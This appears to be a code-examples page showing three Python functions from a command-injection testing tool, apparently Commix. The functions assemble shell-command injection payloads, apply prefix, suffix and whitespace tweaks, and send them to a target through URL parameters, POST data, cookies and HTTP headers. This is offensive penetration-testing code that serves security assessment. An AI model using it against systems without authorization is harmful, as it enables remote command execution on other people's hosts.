예제 #1
0
def injection_test(payload, http_request_method, url):

    # Check if defined method is GET (Default).
    if http_request_method == "GET":

        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)

        # Encoding spaces.
        payload = payload.replace(" ", "%20")

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_GET_param(url)

        target = url.replace(settings.INJECT_TAG, payload)
        request = urllib2.Request(target)

        # Check if defined extra headers.
        headers.do_check(request)

        try:
            # Get the response of the request
            response = requests.get_request_response(request)
        except KeyboardInterrupt:
            response = None

    # Check if defined method is POST.
    else:
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")
        # Define the POST data
        if settings.IS_JSON:
            data = parameter.replace(
                settings.INJECT_TAG,
                urllib.unquote(payload.replace("\"", "\\\"")))
            try:
                data = checks.json_data(data)
            except ValueError:
                pass
        elif settings.IS_XML:
            data = parameter.replace(settings.INJECT_TAG,
                                     urllib.unquote(payload))
        else:
            data = parameter.replace(settings.INJECT_TAG, payload)
        request = urllib2.Request(url, data)

        # Check if defined extra headers.
        headers.do_check(request)

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

        try:
            # Get the response of the request
            response = requests.get_request_response(request)
        except KeyboardInterrupt:
            response = None

    return response, vuln_parameter
예제 #2
0
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = eb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            payload = eb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        # Fixation for specific payload.
        if ")%3B" + _urllib.parse.quote(")}") in payload:
            payload = payload.replace(")%3B" + _urllib.parse.quote(")}"),
                                      ")" + _urllib.parse.quote(")}"))

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":
                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)

                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = _urllib.request.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = _urllib.parse.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                parameter = ''.join(str(e)
                                    for e in parameter).replace("+", "%2B")
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        _urllib.parse.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             _urllib.parse.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = _urllib.request.Request(
                    url, data.encode(settings.UNICODE_ENCODING))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)

        return response
예제 #3
0
    def check_injection(separator, payload, TAG, cmd, prefix, suffix,
                        whitespace, http_request_method, url, vuln_parameter,
                        OUTPUT_TEXTFILE, alter_shell, filename):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = fb_payloads.cmd_execution_alter_shell(
                separator, cmd, OUTPUT_TEXTFILE)
        else:
            payload = fb_payloads.cmd_execution(separator, cmd,
                                                OUTPUT_TEXTFILE)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL != 0:
            payload_msg = payload.replace("\n", "\\n")
            if settings.COMMENT in payload_msg:
                payload = payload.split(settings.COMMENT)[0].strip()
                payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
            debug_msg = "Executing the '" + cmd.split(
                settings.COMMENT)[0].strip() + "' command. "
            sys.stdout.write(settings.print_debug_msg(debug_msg))
            sys.stdout.flush()
            output_payload = "\n" + settings.print_payload(payload)
            if settings.VERBOSITY_LEVEL != 0:
                output_payload = output_payload + "\n"
            sys.stdout.write(output_payload)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined POST data
            if not settings.USER_DEFINED_POST_DATA:
                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url, http_request_method)
                payload = payload.replace(" ", "%20")
                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = _urllib.request.Request(target)
                # Check if defined extra headers.
                headers.do_check(request)
                # Get the response of the request
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = _urllib.parse.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter,
                                                     http_request_method)
                parameter = ''.join(str(e)
                                    for e in parameter).replace("+", "%2B")
                # Define the vulnerable parameter
                vuln_parameter = parameters.vuln_POST_param(parameter, url)
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        _urllib.parse.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             _urllib.parse.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = _urllib.request.Request(
                    url, data.encode(settings.DEFAULT_CODEC))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)
        return response